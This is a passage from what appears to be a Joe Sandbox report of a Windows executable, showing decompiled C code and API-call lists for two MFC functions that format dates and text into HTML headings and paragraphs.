    					 *(_t342 - 4) = 5;
    					L0043DD36();
    					 *(_t342 - 4) = 4;
    					L0043DD36();
    					 *(_t342 - 4) = 3;
    					L0043DD36();
    					 *(_t342 - 4) = 2;
    					L0043DD36();
    					 *(_t342 - 4) = 1;
    					L0043DD36();
    					 *(_t342 - 4) =  *(_t342 - 4) & 0x00000000;
    					L0043DD36();
    					 *(_t342 - 4) =  *(_t342 - 4) | 0xffffffff;
    					L0043DD36();
    					_t200 = _t336;
    					L34:
    					 *[fs:0x0] =  *((intOrPtr*)(_t342 - 0xc));
    					return _t200;
    				}
    				L00404E5D(_t198, _t342 - 0xf4, 0);
    				_t278 = _t342 - 0xf4;
    				_push(_t342 - 0x2c);
    				_push(_t342 - 0x84);
    				_push(_t342 - 0x20);
    				_push(_t342 - 0x10);
    				_push(_t342 - 0x14);
    				_push(_t342 - 0x1c);
    				_push(_t342 - 0x18);
    				 *((intOrPtr*)(_t342 - 0x34)) = 0;
    				_t209 = L00404AAC(_t342 - 0x18, _t278, 0);
    				asm("sbb eax, eax");
    				_t211 =  ~_t209 + 1;
    				if( *((intOrPtr*)(_t342 - 0x2c)) != 0) {
    					L33:
    					 *(_t342 - 4) = 6;
    					L00404A5A(_t211, _t342 - 0xf4, _t336);
    					 *(_t342 - 4) = 5;
    					L0043DD36();
    					 *(_t342 - 4) = 4;
    					L0043DD36();
    					 *(_t342 - 4) = 3;
    					L0043DD36();
    					 *(_t342 - 4) = 2;
    					L0043DD36();
    					 *(_t342 - 4) = 1;
    					L0043DD36();
    					 *(_t342 - 4) =  *(_t342 - 4) & 0x00000000;
    					L0043DD36();
    					 *(_t342 - 4) =  *(_t342 - 4) | 0xffffffff;
    					L0043DD36();
    					_t200 = 0;
    					goto L34;
    				}
    				_t258 = "<P>";
    				while(_t211 == _t336) {
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_push(_t278);
    					_t336 = _t342 - 0x00000084 | 0xffffffff;
    					 *((intOrPtr*)(_t342 - 0x54)) = _t346;
    					_t333 = 0;
    					_push(_t336);
    					_push(_t342 - 0xa4);
    					 *((short*)(_t342 - 0x42)) = 0;
    					 *((short*)(_t342 - 0x44)) = 0;
    					L0043E4BC();
    					_t214 = _t342 - 0x4c;
    					_push(_t336);
    					_push(_t214);
    					L0043E4BC();
    					_t289 = _t214;
    					if(L0042387B(_t214, _t258, _t329, 0, _t336) != 0) {
    						_push(_t289);
    						 *((intOrPtr*)(_t342 - 0x54)) = _t346;
    						_push(_t336);
    						_push(_t342 - 0x94);
    						L0043E4BC();
    						_t226 = _t342 - 0x4c;
    						_push(_t336);
    						L0043E4BC();
    						_t292 = _t342 - 0x4c;
    						if(E00429801(_t342 - 0x4c, _t226) != 0) {
    							_push( *((intOrPtr*)(E00429098(_t292, _t342 - 0x5c, _t342 - 0x84))));
    							 *(_t342 - 4) = 8;
    							_push("<H1>&nbsp;%s</H1>");
    							_push(_t342 - 0x24);
    							L0043E174();
    							_t348 = _t346 + 0xc;
    							 *(_t342 - 4) = 7;
    							L0043DD36();
    							if( *((intOrPtr*)(_t342 - 0xae)) !=  *((intOrPtr*)(_t342 - 0x46)) ||  *((intOrPtr*)(_t342 - 0xb2)) !=  *((intOrPtr*)(_t342 - 0x4a)) ||  *(_t342 - 0xb4) !=  *(_t342 - 0x4c)) {
    								_push(_t342 - 0x24);
    								L0043DE1A();
    							}
    							L0043E0D8();
    							_t234 =  *(_t342 - 0x14);
    							if( *((intOrPtr*)(_t234 - 8)) != _t333) {
    								CharUpperBuffA(_t234, 1);
    							}
    							_push( *((intOrPtr*)(_t342 - 0x10)));
    							_t236 =  *((intOrPtr*)(E00409643(_t342 - 0x38)));
    							 *(_t342 - 4) = 9;
    							if(_t236 == _t333) {
    								_t237 = 0;
    							} else {
    								_t237 =  *_t236;
    							}
    							_t238 = E00429215(_t342 + 8, _t237, _t342 + 8);
    							_t339 = _t238;
    							 *(_t342 - 4) = 7;
    							_t302 =  *((intOrPtr*)(_t342 - 0x38));
    							if( *((intOrPtr*)(_t342 - 0x38)) != _t333) {
    								_t238 = E004096DD(_t302);
    								 *((intOrPtr*)(_t342 - 0x38)) = _t333;
    							}
    							if(_t339 != _t333) {
    								L0043E144();
    								 *(_t342 - 4) = 0xa;
    								L0043DFCA();
    								_t302 = _t342 - 0x6c;
    								 *(_t342 - 4) = 7;
    								L0043DD36();
    								__imp__#6( *((intOrPtr*)(_t342 + 8)), _t238,  *((intOrPtr*)(_t342 + 8)));
    							}
    							_t241 = E004290DB(_t302, _t342 - 0x50, _t342 - 0x84);
    							_push( *((intOrPtr*)(_t342 - 0x10)));
    							 *(_t342 - 4) = 0xb;
    							_push( *_t241);
    							_push( *(_t342 - 0x14));
    							_push( *((intOrPtr*)(_t342 - 0x1c)));
    							_push("<H2>%s - %s, %s</H2><H3>%s</H3>\r\n");
    							_push(_t342 - 0x28);
    							L0043E174();
    							_t346 = _t348 + 0x18;
    							 *(_t342 - 4) = 7;
    							L0043DD36();
    							_push(_t342 - 0x28);
    							L0043DE1A();
    							_push( *((intOrPtr*)(_t342 - 0x18)));
    							_t245 =  *((intOrPtr*)(E00409643(_t342 - 0x3c)));
    							 *(_t342 - 4) = 0xc;
    							if(_t245 == _t333) {
    								_t246 = 0;
    							} else {
    								_t246 =  *_t245;
    							}
    							_t247 = E00429215(_t342 + 8, _t246, _t342 + 8);
    							_t340 = _t247;
    							 *(_t342 - 4) = 7;
    							_t311 =  *((intOrPtr*)(_t342 - 0x3c));
    							if( *((intOrPtr*)(_t342 - 0x3c)) != _t333) {
    								_t247 = E004096DD(_t311);
    								 *((intOrPtr*)(_t342 - 0x3c)) = _t333;
    							}
    							if(_t340 == _t333) {
    								_push("<BR>");
    								_push("\r\n");
    								L0043E156();
    								_push(_t342 - 0x18);
    								_t249 = _t342 - 0x58;
    								_push(_t258);
    								_push(_t249);
    								L0043E168();
    								_push("</P>\r\n");
    								_push(_t249);
    								_t250 = _t342 - 0x74;
    								 *(_t342 - 4) = 0x12;
    								_push(_t250);
    								L0043DE20();
    								_push(_t250);
    								 *(_t342 - 4) = 0x13;
    								L0043DE1A();
    								 *(_t342 - 4) = 0x12;
    								L0043DD36();
    								 *(_t342 - 4) = 7;
    							} else {
    								L0043E144();
    								 *(_t342 - 4) = 0xd;
    								L0043E156();
    								L0043DE26();
    								 *(_t342 - 4) = 0xe;
    								L0043DE26();
    								 *(_t342 - 4) = 0xf;
    								_t251 = _t342 - 0x60;
    								L0043E282();
    								_t252 = _t342 - 0x64;
    								 *(_t342 - 4) = 0x10;
    								L0043E282();
    								 *(_t342 - 4) = 0x11;
    								L0043DE1A();
    								 *(_t342 - 4) = 0x10;
    								L0043DD36();
    								 *(_t342 - 4) = 0xf;
    								L0043DD36();
    								 *(_t342 - 4) = 0xe;
    								L0043DD36();
    								 *(_t342 - 4) = 0xd;
    								L0043DD36();
    								__imp__#6( *((intOrPtr*)(_t342 + 8)), _t252, _t252, _t251, _t247, _t251, _t247, _t342 - 0x30, _t258, "</P>\r\n", "\r\n", "<BR>",  *((intOrPtr*)(_t342 + 8)));
    								 *(_t342 - 4) = 7;
    							}
    							L0043DD36();
    							_t336 = _t342 - 0x4c;
    							asm("movsd");
    							asm("movsd");
    							 *((intOrPtr*)(_t342 - 0x34)) =  *((intOrPtr*)(_t342 - 0x34)) + 1;
    							asm("movsd");
    							asm("movsd");
    							_t333 = 0;
    						}
    					}
    					_t278 = _t342 - 0xf4;
    					_push(_t342 - 0x2c);
    					_push(_t342 - 0x84);
    					_push(_t342 - 0x20);
    					_push(_t342 - 0x10);
    					_push(_t342 - 0x14);
    					_push(_t342 - 0x1c);
    					_push(_t342 - 0x18);
    					_t223 = L00404AAC(_t342 - 0x18, _t278, _t336);
    					asm("sbb eax, eax");
    					_t211 =  ~_t223 + 1;
    					if( *((intOrPtr*)(_t342 - 0x2c)) == _t333) {
    						_t336 = 0;
    						continue;
    					} else {
    						if( *((intOrPtr*)(_t342 - 0x34)) == 0) {
    							goto L33;
    						}
    						_t336 = 1;
    						goto L32;
    					}
    				}
    				goto L33;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00429A6A
    • #540.MFC42(?,00000001,00000000), ref: 00429A7B
    • #540.MFC42(?,00000001,00000000), ref: 00429A88
    • #540.MFC42(?,00000001,00000000), ref: 00429A94
    • #540.MFC42(?,00000001,00000000), ref: 00429AA0
    • #540.MFC42(?,00000001,00000000), ref: 00429AAC
    • #540.MFC42(?,00000001,00000000), ref: 00429AB8
    • #540.MFC42(?,00000001,00000000), ref: 00429AC4
    • memset.MSVCRT ref: 00429ADA
    • memset.MSVCRT ref: 00429AE9
    • memset.MSVCRT ref: 00429AF8
    • #548.MFC42(000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429BD5
    • #548.MFC42(?,?,000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429BE5
    • #548.MFC42(000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C07
    • #548.MFC42(?,?,000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C17
      • Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
      • Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
      • Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0
    • #2818.MFC42(?,<H1>&nbsp;%s</H1>,00000000,?,?,000007E4,?), ref: 00429C4C
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C5B
    • #939.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C8E
    • #4202.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429C96
    • CharUpperBuffA.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429CA6
    • #539.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429CF2
    • #858.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429CFF
    • #800.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429D0B
    • SysFreeString.OLEAUT32(?), ref: 00429D13
    • #2818.MFC42(?,<H2>%s - %s, %s</H2><H3>%s</H3>,?,?,00000000,?,?,?), ref: 00429D43
    • #800.MFC42(?,?,?,?,?,?), ref: 00429D52
    • #939.MFC42(?,?,?,?,?,?,?), ref: 00429D5E
    • #539.MFC42(?,?,?,?,?,?,?,?,?), ref: 00429DAD
    • #6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DC3
    • #537.MFC42(</P>,00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DD0
    • #537.MFC42(<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DDF
    • #922.MFC42(?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?,?), ref: 00429DF1
    • #922.MFC42(?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E00
    • #939.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E0D
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E19
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E25
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E31
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429E3D
    • SysFreeString.OLEAUT32(?), ref: 00429E45
    • #6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429E61
    • #926.MFC42(?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429E6F
    • #924.MFC42(?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429E82
    • #939.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 00429E8F
    • #800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 00429E9B
    • #800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 00429EA7
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F15
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F21
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F2D
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F39
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F45
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F51
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F5D
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F7C
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F88
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429F94
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FA0
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FAC
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FB8
    • #800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 00429FC4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#540$#548#939$#537memset$#2818#539#6877#922BuffCharFreeStringUpper$#4202#858#924#926DateFormatH_prolog
    • String ID: </P>$<BR>$<H1>&nbsp;%s</H1>$<H2>%s - %s, %s</H2><H3>%s</H3>$<P>
    • API String ID: 157677795-1072282055
    • Opcode ID: 0ee7da26b07e629534eb8460bce09e22430eeaca6311155f09fb6cb996764f31
    • Instruction ID: 40827c39c313d85a24ee7feb803662c734e88c338ce95b615f2a86b246eb5e4b
    • Opcode Fuzzy Hash: 0ee7da26b07e629534eb8460bce09e22430eeaca6311155f09fb6cb996764f31
    • Instruction Fuzzy Hash: DA029231D0025DEACF15EBE5D941BEEBBB8AF19308F10409EE405B7282DB781B49DB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E004292F3(void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t172;
    				void* _t173;
    				signed int _t176;
    				short _t181;
    				void* _t183;
    				signed int _t190;
    				void* _t192;
    				void* _t195;
    				signed int _t202;
    				CHAR* _t213;
    				intOrPtr* _t215;
    				intOrPtr _t216;
    				void* _t217;
    				intOrPtr* _t220;
    				intOrPtr* _t224;
    				intOrPtr _t225;
    				void* _t226;
    				void* _t228;
    				void* _t229;
    				void* _t230;
    				void* _t231;
    				char* _t237;
    				void* _t248;
    				void* _t257;
    				void* _t302;
    				void* _t308;
    				signed int _t309;
    				void* _t312;
    				void* _t313;
    				void* _t315;
    				void* _t317;
    				void* _t318;
    				intOrPtr _t320;
    				void* _t321;
    
    				_t302 = __edx;
    				_t172 = E0043E4E0(0x442ff7, _t315);
    				_t318 = _t317 - 0xe0;
    				_push(_t308);
    				_t173 = L00405A94(_t172, _t315 - 0xec, _t308);
    				_push( *((intOrPtr*)(_t315 + 8)));
    				_t309 = 0;
    				 *(_t315 - 4) = 0;
    				if(L00405B3C(_t173, _t315 - 0xec, 0) == 0) {
    					L32:
    					 *(_t315 - 4) =  *(_t315 - 4) | 0xffffffff;
    					L00405AEA(_t174, _t315 - 0xec, _t309);
    					_t176 = _t309;
    					L34:
    					 *[fs:0x0] =  *((intOrPtr*)(_t315 - 0xc));
    					return _t176;
    				}
    				L0043DDD8();
    				 *(_t315 - 4) = 1;
    				L0043DDD8();
    				 *(_t315 - 4) = 2;
    				L0043DDD8();
    				 *(_t315 - 4) = 3;
    				L0043DDD8();
    				 *(_t315 - 4) = 4;
    				L0043DDD8();
    				 *(_t315 - 4) = 5;
    				memset(_t315 - 0x9c, 0, 0x10);
    				memset(_t315 - 0x8c, 0, 0x10);
    				 *(_t315 - 0x9c) = 0x7bc;
    				_t181 = 1;
    				 *(_t315 - 0x8c) = 0x7e4;
    				 *((short*)(_t315 - 0x8a)) = _t181;
    				 *((short*)(_t315 - 0x86)) = _t181;
    				 *((short*)(_t315 - 0x9a)) = _t181;
    				 *((short*)(_t315 - 0x96)) = _t181;
    				_t183 = memset(_t315 - 0xac, 0, 0x10);
    				_t320 = _t318 + 0x24;
    				 *((intOrPtr*)(_t315 - 0x24)) = 0;
    				L00405E26(_t183, _t315 - 0xec, 0);
    				_t248 = _t315 - 0xec;
    				_push(_t315 - 0x24);
    				_push(_t315 - 0x7c);
    				_push(_t315 - 0x18);
    				_push(_t315 - 0x10);
    				_push(_t315 - 0x14);
    				 *((intOrPtr*)(_t315 - 0x2c)) = 0;
    				_t190 = L00405C12(_t315 - 0x14, _t248, 0);
    				asm("sbb eax, eax");
    				_t192 =  ~_t190 + 1;
    				if( *((intOrPtr*)(_t315 - 0x24)) != 0) {
    					L33:
    					 *(_t315 - 4) = 4;
    					L0043DD36();
    					 *(_t315 - 4) = 3;
    					L0043DD36();
    					 *(_t315 - 4) = 2;
    					L0043DD36();
    					 *(_t315 - 4) = 1;
    					L0043DD36();
    					 *(_t315 - 4) =  *(_t315 - 4) & 0x00000000;
    					L0043DD36();
    					 *(_t315 - 4) =  *(_t315 - 4) | 0xffffffff;
    					L00405AEA(_t192, _t315 - 0xec, _t309);
    					_t176 = 0;
    					goto L34;
    				}
    				_t237 = "<P>";
    				while(_t192 == _t309) {
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_push(_t248);
    					_t309 = _t315 - 0x0000007c | 0xffffffff;
    					 *((intOrPtr*)(_t315 - 0x4c)) = _t320;
    					_push(_t309);
    					_push(_t315 - 0x9c);
    					 *((short*)(_t315 - 0x3a)) = 1;
    					 *((short*)(_t315 - 0x3c)) = 1;
    					L0043E4BC();
    					_t195 = _t315 - 0x44;
    					_push(_t309);
    					_push(_t195);
    					L0043E4BC();
    					_t257 = _t195;
    					if(L0042387B(_t195, _t237, _t302, _t315 - 0x44, _t309) != 0) {
    						_push(_t257);
    						 *((intOrPtr*)(_t315 - 0x4c)) = _t320;
    						_push(_t309);
    						_push(_t315 - 0x8c);
    						L0043E4BC();
    						_t205 = _t315 - 0x44;
    						_push(_t309);
    						L0043E4BC();
    						_t265 = _t315 - 0x44;
    						if(E00429801(_t315 - 0x44, _t205) != 0) {
    							_push( *((intOrPtr*)(E00429098(_t265, _t315 - 0x5c, _t315 - 0x7c))));
    							 *(_t315 - 4) = 6;
    							_push("<H1>&nbsp;%s</H1>");
    							_push(_t315 - 0x20);
    							L0043E174();
    							_t321 = _t320 + 0xc;
    							 *(_t315 - 4) = 5;
    							L0043DD36();
    							if( *((intOrPtr*)(_t315 - 0xa6)) !=  *((intOrPtr*)(_t315 - 0x3e)) ||  *((intOrPtr*)(_t315 - 0xaa)) !=  *((intOrPtr*)(_t315 - 0x42)) ||  *(_t315 - 0xac) !=  *(_t315 - 0x44)) {
    								_push(_t315 - 0x20);
    								L0043DE1A();
    							}
    							L0043E0D8();
    							_t213 =  *(_t315 - 0x10);
    							if( *((intOrPtr*)(_t213 - 8)) != 0) {
    								CharUpperBuffA(_t213, 1);
    							}
    							_push( *((intOrPtr*)(_t315 - 0x18)));
    							_t215 =  *((intOrPtr*)(E00409643(_t315 - 0x30)));
    							 *(_t315 - 4) = 7;
    							if(_t215 == 0) {
    								_t216 = 0;
    							} else {
    								_t216 =  *_t215;
    							}
    							_t217 = E00429215(_t315 + 8, _t216, _t315 + 8);
    							_t312 = _t217;
    							 *(_t315 - 4) = 5;
    							_t275 =  *((intOrPtr*)(_t315 - 0x30));
    							if( *((intOrPtr*)(_t315 - 0x30)) != 0) {
    								_t217 = E004096DD(_t275);
    								 *((intOrPtr*)(_t315 - 0x30)) = 0;
    							}
    							if(_t312 != 0) {
    								L0043E144();
    								 *(_t315 - 4) = 8;
    								L0043DFCA();
    								_t275 = _t315 - 0x64;
    								 *(_t315 - 4) = 5;
    								L0043DD36();
    								__imp__#6( *((intOrPtr*)(_t315 + 8)), _t217,  *((intOrPtr*)(_t315 + 8)));
    							}
    							_t220 = E004290DB(_t275, _t315 - 0x54, _t315 - 0x7c);
    							_push( *((intOrPtr*)(_t315 - 0x18)));
    							 *(_t315 - 4) = 9;
    							_push( *_t220);
    							_push( *(_t315 - 0x10));
    							_push("<H2>%s, %s</H2><H3>%s</H3>\r\n");
    							_push(_t315 - 0x1c);
    							L0043E174();
    							_t320 = _t321 + 0x14;
    							 *(_t315 - 4) = 5;
    							L0043DD36();
    							_push(_t315 - 0x1c);
    							L0043DE1A();
    							_push( *((intOrPtr*)(_t315 - 0x14)));
    							_t224 =  *((intOrPtr*)(E00409643(_t315 - 0x34)));
    							 *(_t315 - 4) = 0xa;
    							if(_t224 == 0) {
    								_t225 = 0;
    							} else {
    								_t225 =  *_t224;
    							}
    							_t226 = E00429215(_t315 + 8, _t225, _t315 + 8);
    							_t313 = _t226;
    							 *(_t315 - 4) = 5;
    							_t284 =  *((intOrPtr*)(_t315 - 0x34));
    							if( *((intOrPtr*)(_t315 - 0x34)) != 0) {
    								_t226 = E004096DD(_t284);
    								 *((intOrPtr*)(_t315 - 0x34)) = 0;
    							}
    							if(_t313 == 0) {
    								_push("<BR>");
    								_push("\r\n");
    								L0043E156();
    								_push(_t315 - 0x14);
    								_t228 = _t315 - 0x50;
    								_push(_t237);
    								_push(_t228);
    								L0043E168();
    								_push("</P>\r\n");
    								_push(_t228);
    								_t229 = _t315 - 0x6c;
    								 *(_t315 - 4) = 0x10;
    								_push(_t229);
    								L0043DE20();
    								_push(_t229);
    								 *(_t315 - 4) = 0x11;
    								L0043DE1A();
    								 *(_t315 - 4) = 0x10;
    								L0043DD36();
    								 *(_t315 - 4) = 5;
    							} else {
    								L0043E144();
    								 *(_t315 - 4) = 0xb;
    								L0043E156();
    								L0043DE26();
    								 *(_t315 - 4) = 0xc;
    								L0043DE26();
    								 *(_t315 - 4) = 0xd;
    								_t230 = _t315 - 0x58;
    								L0043E282();
    								_t231 = _t315 - 0x48;
    								 *(_t315 - 4) = 0xe;
    								L0043E282();
    								 *(_t315 - 4) = 0xf;
    								L0043DE1A();
    								 *(_t315 - 4) = 0xe;
    								L0043DD36();
    								 *(_t315 - 4) = 0xd;
    								L0043DD36();
    								 *(_t315 - 4) = 0xc;
    								L0043DD36();
    								 *(_t315 - 4) = 0xb;
    								L0043DD36();
    								__imp__#6( *((intOrPtr*)(_t315 + 8)), _t231, _t231, _t230, _t226, _t230, _t226, _t315 - 0x28, _t237, "</P>\r\n", "\r\n", "<BR>",  *((intOrPtr*)(_t315 + 8)));
    								 *(_t315 - 4) = 5;
    							}
    							L0043DD36();
    							_t309 = _t315 - 0x44;
    							asm("movsd");
    							asm("movsd");
    							 *((intOrPtr*)(_t315 - 0x2c)) =  *((intOrPtr*)(_t315 - 0x2c)) + 1;
    							asm("movsd");
    							asm("movsd");
    						}
    					}
    					_t248 = _t315 - 0xec;
    					_push(_t315 - 0x24);
    					_push(_t315 - 0x7c);
    					_push(_t315 - 0x18);
    					_push(_t315 - 0x10);
    					_push(_t315 - 0x14);
    					_t202 = L00405C12(_t315 - 0x14, _t248, _t309);
    					asm("sbb eax, eax");
    					_t192 =  ~_t202 + 1;
    					if( *((intOrPtr*)(_t315 - 0x24)) == 0) {
    						_t309 = 0;
    						continue;
    					} else {
    						if( *((intOrPtr*)(_t315 - 0x2c)) == 0) {
    							goto L33;
    						}
    						 *(_t315 - 4) = 4;
    						L0043DD36();
    						 *(_t315 - 4) = 3;
    						L0043DD36();
    						 *(_t315 - 4) = 2;
    						L0043DD36();
    						 *(_t315 - 4) = 1;
    						L0043DD36();
    						 *(_t315 - 4) =  *(_t315 - 4) & 0x00000000;
    						L0043DD36();
    						_t309 = 1;
    						goto L32;
    					}
    				}
    				goto L33;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004292F8
    • #540.MFC42(?,00000001,00000000), ref: 0042932F
    • #540.MFC42(?,00000001,00000000), ref: 0042933B
    • #540.MFC42(?,00000001,00000000), ref: 00429347
    • #540.MFC42(?,00000001,00000000), ref: 00429353
    • #540.MFC42(?,00000001,00000000), ref: 0042935F
    • memset.MSVCRT ref: 00429372
    • memset.MSVCRT ref: 00429381
    • memset.MSVCRT ref: 004293C1
    • #548.MFC42(000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042943F
    • #548.MFC42(?,?,000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042944F
    • #548.MFC42(000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429471
    • #548.MFC42(?,?,000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429481
      • Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
      • Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
      • Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0
    • #2818.MFC42(?,<H1>&nbsp;%s</H1>,00000000,?,?,000007E4,?), ref: 004294B3
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004294C2
    • #939.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004294F5
    • #4202.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004294FD
    • CharUpperBuffA.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042950F
    • #539.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042955B
    • #858.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429568
    • #800.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429574
    • SysFreeString.OLEAUT32(?), ref: 0042957C
    • #2818.MFC42(?,<H2>%s, %s</H2><H3>%s</H3>,?,00000000,?,?,?), ref: 004295A6
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004295B5
    • #939.MFC42(?,?,?,?,?,?), ref: 004295C1
    • #539.MFC42(?,?,?,?,?,?,?,?), ref: 00429610
    • #6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429626
    • #537.MFC42(</P>,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429633
    • #537.MFC42(<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429642
    • #922.MFC42(?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429654
    • #922.MFC42(?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429663
    • #939.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429670
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 0042967C
    • #800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429688
